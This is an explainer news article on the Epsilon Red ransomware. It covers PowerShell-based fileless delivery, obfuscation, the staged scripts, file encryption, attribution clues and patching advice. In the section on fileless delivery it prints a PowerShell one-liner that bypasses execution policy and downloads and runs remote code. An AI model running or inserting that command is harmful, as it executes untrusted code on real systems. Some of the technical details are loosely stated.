Have you patched your servers?

A new ransomware threat, known as Epsilon Red, targets unpatched Microsoft-based servers in enterprise data centers. Named after a little-known Marvel comic villain, Epsilon Red was recently discovered by a cybersecurity firm known as Sophos. Since its discovery, ransomware has attacked numerous organizations around the world.

What Is PowerShell?

According to Sophos, the malware utilizes a combination of Go programming and PowerShell scripts to attack targets. Epsilon Red's PowerShell script features give it the ability to compromise Microsoft-based servers. Microsoft's PowerShell is a command-line shell and scripting programming platform built on .NET Framework.

Related: What Is Microsoft PowerShell?

PowerShell offers features such as remote command execution capability, access to core Microsoft APIs, etc. All of these features make PowerShell useful for system administrators and users to automate OS management tasks and processes.

However, PowerShell can also be used as a powerful tool to create malware. The scripts' ability to access Microsoft's Windows Management Instrumentation (WMI) tools makes it an attractive option for attackers. Window's Management Instrumentation interface allows PowerShell scripts to be recognized as inherently trustworthy to a Microsoft system. This inherent trust allows PowerShell scripts to be used as an effective cover for fileless ransomware.

Delivering Fileless Ransomware With PowerShell

Fileless ransomware is a form of malicious software that executes by piggybacking from legitimate software. PowerShell-based fileless malware utilizes PowerShell's ability to load directly into a device's memory. This feature helps to shield malware within PowerShell scripts from being detected.

In a typical scenario, when a script executes, it must first be written to a device's disk. This allows endpoint security solutions to detect the script. Since PowerShell is excluded from standard script execution processes, it can bypass endpoint security. In addition, the use of a bypass parameter in PowerShell scripts allows attackers to subvert network scripting restrictions.

An example of a PowerShell bypass parameter is:

        powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))
    

As you can see, it is relatively easy to design PowerShell bypass parameters.

In response, Microsoft released patching to address the remote malware execution vulnerability associated with PowerShell. Still, patches are only effective when they are used. Many organizations have relaxed patching standards that leave their environments exposed. The design of Epsilon Red is to capitalize on that exposure.

The Double-Edged Usefulness of Epsilon Red

Since Epsilon Red is most effective with unpatched Microsoft servers, the malicious software can be utilized as both a ransomware and recognizance tool. Whether or not Epsilon succeeds in an environment gives an attacker a deeper insight into the security capabilities of a target.

If Epsilon is successful in accessing a Microsoft Exchange Server, an organization has shown that it lacks conformity to common patching security best practices. For an attacker, this may indicate the ease with which the rest of a target's environment can be infiltrated by Epsilon.

Epsilon Red uses obfuscation techniques to hide its payload. Obfuscation makes code unreadable and is used in PowerShell malware to avoid PowerShell scripts' high readability. With obfuscation, PowerShell alias cmdlets are used to make it difficult for antivirus software to identify malicious scripts in PowerShell's logs.

An image of PowerShell cmdlet options

Still, obfuscated PowerShell scripts can be identified with the right eye. A common sign of an impending PowerShell Script attack is the creation of a WebClient object. An attacker will create a WebClient Object in PowerShell code to establish an external connection to a remote URL that contains malicious code.

If an organization could be hacked due to relaxed patching, the odds of it having sufficient security protection that is capable of detecting obfuscated PowerShell scripts is lowered. In contrast, if Epsilon Red fails to infiltrate a server, this tells an attacker that a target's network may be able to deobfuscate PowerShell malware quickly, making the attack less valuable.

Epsilon Red's Network Infiltration

The functionality of Epsilon Red is straightforward. The software uses a series of Powershell scripts to infiltrate servers. These PowerShell scripts are numbered from 1.ps1 to 12.ps1.The design of each PowerShell script is to prepare a target server for the final payload.

All PowerShell scripts in Epsilon Red have an individualized purpose. One of the PowerShell scripts in Epsilon Red is designed to workaround a target's network firewall rules. Another in the series is designed to uninstall a target's antivirus software.

As you might guess, these scripts work in unison to ensure that when the payload is delivered, a target will not be able to quickly stop its progression.

Delivering the Payload

When Epsilon's PowerShell scripts have paved the way for its final payload, it is delivered as an extension, Red.exe. Once it infiltrates a server, Red.exe scans the server's files and makes a list of the directory paths for each file it discovers. After the list's creation, child processes are generated from the parent malware file for each directory path in the list. Then, each ransomware child file encrypts a directory path from the list file.

Once all of the directory paths on Epsilon's list have been encrypted, a .txt file is left to notify a target and state the attacker's demands. In addition, all accessible network nodes connected to the compromised server are then infiltrated, and the malware's reach into the network can advance.

Who's Behind Epsilon Red?

The identity of the attackers utilizing Epsilon Red is still unknown. But, some clues hint at the attackers' origins. The first clue is the name of the malware. Epsilon Red is an X-Men villain with a Russian origin story.

The second clue is in the .txt file ransom note left by the code. It is similar to the note left by a ransomware gang known as REvil. However, this similarity does not indicate that the attackers are members of the gang. REvil operates a RaaS (Ransomware as a service) operation where affiliates pay REvil for access to its malware.

Protecting Yourself From Epsilon Red

So far, Epsilon Red has successfully infiltrated unpatched servers. This means that one of the best defenses against Epsilon Red, and similar ransomware malware, is to ensure that your environment is properly managed. In addition, having a security solution that can quickly deobfuscate PowerShell scripts will be a beneficial addition to your environment.